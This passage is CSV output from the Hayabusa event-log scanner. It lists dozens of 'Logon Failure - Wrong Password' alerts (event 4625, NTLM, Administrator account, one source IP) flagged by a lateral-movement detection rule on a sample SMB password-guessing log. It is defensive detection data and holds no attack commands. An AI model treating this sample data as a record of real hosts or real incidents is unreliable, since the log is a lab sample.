+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q3QxOH7ok8RR068t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dJFj6Ckw1HdK9w52 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qqu3Im4HXQNyGnYm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bk5dmjQDnpSlREum | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.279 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pk4BvYgXBR2whf80 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.327 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i6n1su2TUr7ONQr4 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.368 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: givsEAGfG0smN9Re | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.418 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i2YuM0i7a2QuY7xb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.470 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xuocQPZpd91adY0E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.541 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PvGB1dZrfDWyZoqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.588 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w4oi8iL88rJo7g2Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.676 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cF3OUnytXi4NjvqB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.725 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WKkJcp3TYj31iJUM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G0E44RVqAE1feU0b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ny5LCb1qOIUhxOPY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9jcDgzzqH26DjQ1k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yil94cFkU6UP24SK | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bkdVHF3vggCcuNdn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4dRRI2CS3aVIX4nX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: chDZq3VgxIE2mRb9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.046 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HLVvgMmqLXKZADON | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i4avO2AJSlNb0IUL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.128 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mdo5CvycGvGhn33y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.171 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: heJfjLl1vbX6lMjZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wOP1E6hd4Jtj4gob | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xa7kMCNz0bEGTBqX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.293 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HSxTQ4HsZt2DeYVe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.341 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YxHpSQwFSV4hveVM | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n3OwzSPomxZLoCe6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e9IfwDZIfYT6A50K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.463 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JOf6DbRX4zlNqLdb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 00kXrnJNH40NyoYL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nsNHcb9pnpdRgeL7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.592 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ucMhgxMXy9Ch1jNm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cfi3ZaLTECJgjM9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: usugjEEBHlhJvOyu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WQ1pM2CVLt5ITVD5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.746 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NIboW7hNljF3HPpk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rOk5W4rkSYRRw4xS | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.858 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AJTfcwd8rnFc06iF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.930 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6sm415W5zkvjdnTV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KEiSbtlmW4ou1mc7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xWeZV5pHt94adwUy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5np7HeCPAFTDdTXJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.088 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gXbe2jEJVtwaQXlr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.134 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7hZFiUCJnaBdHcw4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a71wyo41KV1ZoT7p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ogB17WdeOiC19rqn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.286 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ANOLPWG12lkW39Ei | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.332 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y1vf7OUxb6TH3Q4H | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.368 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bxU5yumSieUzSgzH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v9K5EoWWASU8SlSe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.445 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PwZLRPFxaFWwjZEe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.500 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8fXgFFb3HTMunsoi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R1RozAr1uhux4cYW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.586 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n7EmuUSv03RnhKsF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jw410HEW8EC3MC9f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UTYp8cEbt3Yggo3J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.727 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yWJVzgYLWIo7SGCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DP13jPdW5Gdl8z56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LNXOWjHmMDhfFVon | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kka1RiF3f7Nhkf8x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.959 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2o90lG6attzWU4ZN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.998 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PyPK9kuJdflQ4RKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.028 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a9I3El7d7anR0kIz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eDUMTEfNhFuuqMle | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.110 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e0F70d1WstkqnQgA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bm0txApQSp1U42N3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JeEe5ENSIZnfc3FG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oasE54Z1FlpswY0d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bhje1BgvxOlG28JM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.321 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L9iTIv4UQ4En9RA2 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.356 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mg8KFm1lCeImj8Sb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h17Fz1s6GJki61jg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.440 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Pjjn4FAkJn4h32r | IP Addr: 192.168.198.149 | AuthPackage: 